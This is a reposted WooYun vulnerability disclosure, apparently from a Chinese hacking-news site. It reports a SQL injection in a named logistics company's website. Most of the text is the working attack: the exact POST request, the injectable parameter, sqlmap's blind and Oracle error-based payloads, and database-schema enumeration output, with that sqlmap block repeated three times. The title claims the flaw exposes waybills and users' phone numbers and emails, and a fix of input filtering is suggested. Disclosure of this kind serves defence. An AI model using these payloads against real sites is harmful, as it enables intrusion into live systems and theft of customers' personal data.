记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

盛辉物流主站某处sql注入泄露所有运单信息以及注册用户手机号邮箱,另可getshell

2016-05-22 02:20

http://www.shenghui56.com/

注入产生在此处

wangdian.jpg





code 区域
POST /api/getcity HTTP/1.1

Host: www.shenghui56.com

Content-Length: 10

Accept: application/json, text/javascript, */*; q=0.01

Origin: http://www.shenghui56.com

X-Requested-With: XMLHttpRequest

User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36

Content-Type: application/x-www-form-urlencoded

Referer: http://www.shenghui56.com/

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.8

Cookie: JSESSIONID=F78D3014F8BDECE128318FDC1E83A1CE; Hm_lvt_82116c626a8d504a5c0675073362ef6f=1459869997; Hm_lpvt_82116c626a8d504a5c0675073362ef6f=1459869997



pid=350000





code 区域
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

---

Place: POST

Parameter: pid

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: pid=350000' AND 6309=6309 AND 'bqAV'='bqAV



Type: error-based

Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)

Payload: pid=350000' AND 4929=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(109)||CHR(100)||CHR(117)||CHR(58)||(SELECT (CASE WHEN (4929=4929) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(107)||CHR(99)||CHR(107)||CHR(58)||CHR(62))) FROM DUAL) AND 'jjPk'='jjPk

---

[12:49:34] [INFO] the back-end DBMS is Oracle

back-end DBMS: Oracle

[12:49:34] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes

[12:49:34] [INFO] fetching database (schema) names

[12:49:34] [INFO] the SQL query used returns 24 entries

available databases [24]:

[*] APEX_030200

[*] APPQOSSYS

[*] CTXSYS

[*] DBSNMP

[*] EXFSYS

[*] FLOWS_FILES

[*] HD

[*] MDSYS

[*] MWLAPP

[*] OLAPSYS

[*] ORDDATA

[*] ORDSYS

[*] OUTLN

[*] OWBSYS

[*] SHAC

[*] SHEFFE

[*] SHITEM

[*] SHWLAPP

[*] SMS_XTTX

[*] SYS

[*] SYSMAN

[*] SYSTEM

[*] WMSYS

[*] XDB

漏洞证明:

code 区域
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

---

Place: POST

Parameter: pid

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: pid=350000' AND 6309=6309 AND 'bqAV'='bqAV



Type: error-based

Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)

Payload: pid=350000' AND 4929=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(109)||CHR(100)||CHR(117)||CHR(58)||(SELECT (CASE WHEN (4929=4929) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(107)||CHR(99)||CHR(107)||CHR(58)||CHR(62))) FROM DUAL) AND 'jjPk'='jjPk

---

[12:49:34] [INFO] the back-end DBMS is Oracle

back-end DBMS: Oracle

[12:49:34] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes

[12:49:34] [INFO] fetching database (schema) names

[12:49:34] [INFO] the SQL query used returns 24 entries

available databases [24]:

[*] APEX_030200

[*] APPQOSSYS

[*] CTXSYS

[*] DBSNMP

[*] EXFSYS

[*] FLOWS_FILES

[*] HD

[*] MDSYS

[*] MWLAPP

[*] OLAPSYS

[*] ORDDATA

[*] ORDSYS

[*] OUTLN

[*] OWBSYS

[*] SHAC

[*] SHEFFE

[*] SHITEM

[*] SHWLAPP

[*] SMS_XTTX

[*] SYS

[*] SYSMAN

[*] SYSTEM

[*] WMSYS

[*] XDB





code 区域
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

---

Place: POST

Parameter: pid

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: pid=350000' AND 6309=6309 AND 'bqAV'='bqAV



Type: error-based

Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)

Payload: pid=350000' AND 4929=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(109)||CHR(100)||CHR(117)||CHR(58)||(SELECT (CASE WHEN (4929=4929) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(107)||CHR(99)||CHR(107)||CHR(58)||CHR(62))) FROM DUAL) AND 'jjPk'='jjPk

---

[12:51:16] [INFO] the back-end DBMS is Oracle

back-end DBMS: Oracle

[12:51:16] [INFO] fetching current database

[12:51:16] [INFO] resumed: SHWLAPP

current schema (equivalent to database on Oracle): 'SHWLAPP'





biao.jpg

shuju11.jpg



只是跑跑了数据个数,不干脱裤那种事。。。

修复方案:

过滤啊大哥。。地址也是可控的

知识来源: www.wooyun.org/bugs/wooyun-2016-0193076

阅读:128297 | 评论:0 | 标签:注入

想收藏或者和大家分享这篇好文章→复制链接地址

“盛辉物流主站某处sql注入泄露所有运单信息以及注册用户手机号邮箱,另可getshell”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云

本页关键词